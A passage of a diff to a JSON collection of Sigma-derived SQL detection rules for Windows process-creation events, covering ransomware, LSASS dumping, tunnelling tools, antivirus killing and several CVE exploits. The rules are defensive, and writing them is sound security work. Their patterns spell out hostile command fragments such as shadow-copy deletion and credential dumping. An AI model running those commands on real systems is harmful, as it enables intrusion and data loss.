related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ + "attack.privilege_escalation", "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.t1033" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "status": "test", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ 
- "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe 
server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_pua_chisel.yml" - }, - { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName 
LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" - }, - { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, 
regsvr32, mshta, eventvwr\n", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.execution", - "attack.t1574.002" + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + 
"attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" - ], 
- "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" - }, - { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", - "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "falsepositives": [ - "Legitimate software creating script event consumers" + "attack.defense_evasion", + "attack.t1127" ], - "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "status": "experimental", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, 
and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], 
@@ -10299,73 +9981,28 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" - }, - { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_hktl_dinjector.yml" - }, - { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' 
AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { "title": "Potential SMB Relay Attack Tool Execution", @@ -10386,26 +10023,6 @@ ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, - { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, { "title": "HackTool - winPEAS Execution", "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", 
@@ -10428,43 +10045,63 @@ "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + }, + { + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { "title": "Fireball Archer Install", 
@@ -10487,241 +10124,222 @@ "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", - "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' 
ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. 
This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": 